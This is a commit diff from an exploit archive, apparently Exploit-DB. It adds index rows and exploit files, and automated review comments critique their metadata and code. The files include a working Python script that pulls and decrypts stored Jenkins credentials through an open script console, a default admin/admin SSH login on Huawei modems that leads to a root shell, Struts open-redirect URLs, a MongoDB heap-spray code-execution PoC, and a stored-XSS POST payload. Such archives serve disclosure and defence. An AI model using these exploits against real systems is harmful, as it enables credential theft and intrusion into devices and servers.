Commit f98ebec

Author: Offensive Security (committed)
DB: 2015-11-11
11 new exploits
1 parent 8a3d4b8 commit f98ebec

12 files changed

Lines changed: 1351 additions & 0 deletions

files.csv

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -34730,6 +34730,7 @@ id,file,description,date,author,platform,type,port
3473034730
38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting Vulnerability",2013-04-09,Beni_Vanda,php,webapps,0
3473134731
38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
3473234732
38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
34733+
38442,platforms/php/dos/38442.txt,"PHPMyLicense 3.0.0 - 3.1.4 - DoS",2015-10-11,"Aria Akhavan Rezayat",php,dos,0
3473334734
38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0
3473434735
38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
3473534736
38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL injection",2015-10-11,"Omer Ramić",php,webapps,0
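Review bot: the new 38442 row disagrees with the advisory file added in this same commit: the CSV files it under platforms/php/dos with the description "PHPMyLicense 3.0.0 - 3.1.4 - DoS" and the date 2015-10-11, while 38442.txt is titled "PHPMyLicense Stored Cross Site Scripting", lists "Category: Webapps" and is dated 09-10-2015. Either the row (type `webapps`, a description naming stored XSS, a path under platforms/php/webapps/) or the file header should be corrected so the index and the advisory say the same thing.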
@@ -34920,7 +34921,10 @@ id,file,description,date,author,platform,type,port
3492034921
38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0
3492134922
38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
3492234923
38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0
34924+
38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library <= 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0
3492334925
38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0
34926+
38651,platforms/php/webapps/38651.txt,"eBay Magento CE <= 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / DoS)",2015-11-07,"Dawid Golunski",php,webapps,0
34927+
38652,platforms/php/webapps/38652.txt,"Google AdWords <= 6.2.0 API client libraries - XML eXternal Entity Injection (XXE)",2015-11-07,"Dawid Golunski",php,webapps,0
3492434928
38653,platforms/asp/webapps/38653.txt,"Corda Highwire 'Highwire.ashx' File Path Disclosure Vulnerability",2013-07-12,"Adam Willard",asp,webapps,0
3492534929
38654,platforms/php/webapps/38654.txt,"OpenEMR <= 4.1 'note' Parameter HTML Injection Vulnerability",2013-07-12,"Nate Drier",php,webapps,0
3492634930
38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector 'redirector.corda' Cross Site Scripting Vulnerability",2013-07-12,"Adam Willard",asp,webapps,0
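Review bot: rows 38649 and 38652 cover the same library but name it differently ("Google AdWords API PHP client library <= 6.2.0" versus "Google AdWords <= 6.2.0 API client libraries"), and the second places the version bound inside the product name; a normalized description such as "Google AdWords API PHP client library <= 6.2.0 - XML eXternal Entity Injection (XXE)" keeps both entries findable under one product string. Row 38651's "(Potential Code Execution / DoS)" parenthetical leaves the primary impact unclear; state the confirmed impact first and the speculative one after it.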
@@ -34930,3 +34934,10 @@ id,file,description,date,author,platform,type,port
3493034934
38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More PHP Upload Vulnerability",2015-11-09,metasploit,php,remote,0
3493134935
38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - CSRF Vulnerability",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0
3493234936
38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0
34937+
38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0
34938+
38664,platforms/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps,0
34939+
38665,platforms/php/webapps/38665.txt,"YESWIKI 0.2 - Path Traversal Vulnerability",2015-11-10,HaHwul,php,webapps,0
34940+
38666,platforms/multiple/remote/38666.txt,"Apache Struts <= 2.2.3 Multiple Open Redirection Vulnerabilities",2013-07-16,"Takeshi Terada",multiple,remote,0
34941+
38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow Vulnerability",2013-07-15,"Zachary Cutlip",windows,remote,0
34942+
38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability",2013-07-09,"Brad Antoniewicz",windows,local,0
34943+
38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution Vulnerability",2013-06-04,"SCRT Security",multiple,remote,0
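Review bot: the 38664 row, "Jenkins 1.633 - Unauthenticated Credential Recovery", does not reflect the vendor response recorded in the header of 38664.py in this same commit ("Recommend this be rejected as a vulnerability"); the description should mark the entry as disputed so that readers do not take the index as confirming a Jenkins vulnerability. Separately, 38663 is a default-credential disclosure with no exploit code, yet it is typed `remote` under platforms/hardware; check whether the index convention for default credentials fits that type.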
Lines changed: 42 additions & 0 deletions
@@ -0,0 +1,42 @@
1+
# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on
2+
Adsl Modems
3+
# Date: 10.11.2015
4+
# Exploit Author: Murat Sahin
5+
# Vendor Homepage: Huawei
6+
# Version: HG630a and HG630a-50
7+
# Tested on: linux,windows
8+
9+
Adsl modems force you to change admin web interface password. Even though
10+
you can change admin password on the web interface, the password you
11+
assign does not apply to ssh. So, SSH password always will be
12+
'Username:admin Password:admin'.
13+
14+
Ex:
15+
16+
*ssh admin@modemIP <admin@192.168.1.1>*
17+
admin@modemIP <admin@192.168.1.1>'s password:*admin*
18+
PTY allocation request failed on channel 0
19+
------------------------------
20+
-
21+
-----Welcome to ATP Cli------
22+
-------------------------------
23+
ATP>?
24+
?
25+
cls
26+
debug
27+
help
28+
save
29+
?
30+
exit
31+
ATP>shell
32+
shell
33+
34+
35+
BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
36+
Enter 'help' for a list of built-in commands.
37+
38+
# cat /proc/version
39+
cat /proc/version
40+
Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2
41+
(Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
42+
#
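Review bot: the advisory gives no mitigation or fix status. It states that the web-interface password change does not propagate to SSH, but not whether the SSH password can be changed from the ATP CLI, whether the SSH service can be disabled or restricted to the LAN side, or whether the vendor was contacted, and the only version evidence is the kernel build string from /proc/version rather than a firmware version; those are the details an operator needs to judge exposure and they belong in the header. Minor: the title is wrapped across lines 1-2 ("...Password on" / "Adsl Modems") and "Vendor Homepage: Huawei" is not a URL.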

platforms/java/webapps/38664.py

Lines changed: 60 additions & 0 deletions
@@ -0,0 +1,60 @@
1+
# Exploit Title: Jenkins Unauthenticated Credential Recovery
2+
# Disclosure Date: 10/14/2015
3+
# Response Date: 10/14/2015
4+
# Response: "Recommend this be rejected as a vulnerability."
5+
# Full report including response: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
6+
# Vendor Homepage: https://jenkins-ci.org/
7+
# Tested on: Jenkins v1.633
8+
# Author = 'Th3R3p0' | Justin Massey
9+
# Google Dork: intitle:"Dashboard [Jenkins]" Credentials
10+
11+
import requests
12+
import re
13+
from BeautifulSoup import BeautifulSoup
14+
import urllib
15+
16+
17+
# Usage: Modify the URL below to match the target host and port
18+
# Must have trailing slash at end of URL
19+
url='http://192.168.1.151:8080/'
20+
21+
# makes request to gather all users with stored credentials
22+
r= requests.get(url + 'credential-store/domain/_/')
23+
soup = BeautifulSoup(r.text)
24+
25+
# loop to go through all hrefs and match the regex "credential" and add the urls to the users list
26+
users = []
27+
for link in soup.body.findAll('a', href=True):
28+
m = re.match("credential", link['href'])
29+
if m:
30+
if link['href'] not in users:
31+
users.append(link['href'])
32+
33+
for users in users:
34+
r2 = requests.get(url + 'credential-store/domain/_/'+users+'/update')
35+
soup2 = BeautifulSoup(r2.text)
36+
37+
# Finds the user and password value in html and stores in encPass variable
38+
user = soup2.body.findAll(attrs={"name" : "_.username"})[0]['value']
39+
encPass = soup2.body.findAll(attrs={"name" : "_.password"})[0]['value']
40+
# Encodes the password to www-form-urlencoded standards needed for the expected content type
41+
encPassEncoded = urllib.quote(encPass, safe='')
42+
43+
# Script to run in groovy scripting engine to decrypt the password
44+
script = 'script=hudson.util.Secret.decrypt+%%27' \
45+
'%s'\
46+
'%%27&json=%%7B%%22script%%22%%3A+%%22hudson.util.Secret.decrypt+%%27' \
47+
'%s' \
48+
'%%27%%22%%2C+%%22%%22%%3A+%%22%%22%%7D&Submit=Run' % (encPassEncoded, encPassEncoded)
49+
50+
# Using sessions because the POST requires a session token to be present
51+
with requests.Session() as s:
52+
r3 = s.get(url+'script')
53+
headers = {'content-type': 'application/x-www-form-urlencoded'}
54+
r3 = s.post(url+'script',data=script, headers=headers)
55+
soup3 = BeautifulSoup(r3.text)
56+
57+
# Extracts password from body
58+
password = soup3.body.findAll('pre')[1].text
59+
password = re.sub('Result:', '', password)
60+
print "User: %s | Password:%s" % (user, password)
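Review bot: the script never authenticates, so its precondition is a Jenkins instance whose anonymous user can both read credential-store/domain/_/ and run the /script console; that precondition is stated nowhere in the header, and it is most likely the basis of the vendor's "Recommend this be rejected" response, so the header should say that the underlying weakness is an authorization misconfiguration rather than a Jenkins bug. Code points: the comment "Using sessions because the POST requires a session token to be present" is inaccurate, since nothing is extracted from the r3 GET and sent with the POST; `for users in users:` shadows the list with its element and should be renamed (for example `for cred in users:`); and `print "..."`, `urllib.quote` and the `BeautifulSoup` 3.x import make this Python 2 only, which the header should state.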
Lines changed: 10 additions & 0 deletions
@@ -0,0 +1,10 @@
1+
source: http://www.securityfocus.com/bid/61196/info
2+
3+
Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
4+
5+
An attacker can leverage these issues by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
6+
7+
Apache Struts 2.0.0 prior to 2.3.15.1 are vulnerable.
8+
9+
http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/
10+
http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23
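Review bot: the affected range given here ("Apache Struts 2.0.0 prior to 2.3.15.1") disagrees with the files.csv row added in this commit, which lists "Apache Struts <= 2.2.3"; one of the two should be corrected, and since the text implies 2.3.15.1 is the fixed release, the advisory should state that upgrade as the remediation. The two sample URLs also use www.example.com as both the vulnerable host and the redirect target, so as written they do not demonstrate a redirect to a foreign origin.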
Lines changed: 13 additions & 0 deletions
@@ -0,0 +1,13 @@
1+
source: http://www.securityfocus.com/bid/61309/info
2+
3+
MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker can exploit this vulnerability to execute arbitrary code within the context of the affected application.
6+
7+
MongoDB 2.4.4 is vulnerable; other versions may also be affected.
8+
9+
use databaseMapped
10+
11+
sizechunk=0x1338; chunk=""; for(i=0;i<sizechunk;i++){ chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00"; } for(i=0;i<30000;i++){ db.my_collection.insert({my_chunk:chunk}) }
12+
13+
db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")');
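Review bot: the description ("fails to properly sanitize user-supplied input") does not match the PoC, which is a memory-corruption trigger: it fills a collection with 30000 documents of a repeated 8-byte pattern and then calls Mongo.prototype.find through db.eval with mismatched arguments. The write-up should say so, and should state the preconditions visible in the PoC, namely shell access with permission to run db.eval and server-side JavaScript enabled, since restricting either is the mitigation operators will look for. The version line ("2.4.4 is vulnerable; other versions may also be affected") should also be carried into the files.csv description, which currently gives no version.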

platforms/php/dos/38442.txt

Lines changed: 27 additions & 0 deletions
@@ -0,0 +1,27 @@
1+
Hello, I want to report following exploit:
2+
3+
4+
# Exploit Title: PHPMyLicense Stored Cross Site Scripting
5+
# Date: 09-10-2015
6+
# Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH
7+
# Website: https://websec-test.com
8+
# Vendor Homepage: https://phpmylicense.com
9+
# Software Link: http://codecanyon.net/item/phpmylicense/11719122
10+
# Version: 3.0.0 - 3.1.4 (REQUIRED)
11+
# Category: Webapps
12+
13+
1.) Description:
14+
15+
Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.
16+
17+
2.) Proof of Concept:
18+
19+
localhost/phpmylicense/ajax/
20+
21+
POST:
22+
23+
comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20&serialkey=bla&status=processing
24+
25+
3.) Solution:
26+
27+
None. - No Update available for it.
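Review bot: the file keeps the submitter's email salutation ("Hello, I want to report following exploit:") and the template residue "(REQUIRED)" on the Version line; both should be stripped before archiving. The header also disagrees with the files.csv row in this commit, which types the entry as php/dos with a "DoS" description and the date 2015-10-11, while the file says "Stored Cross Site Scripting", "Category: Webapps" and 09-10-2015. The Description section should name the affected input (the PoC shows the comments parameter of the newlicense handler at ajax/), and the "Solution: None" line should record whether the vendor was notified and when.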
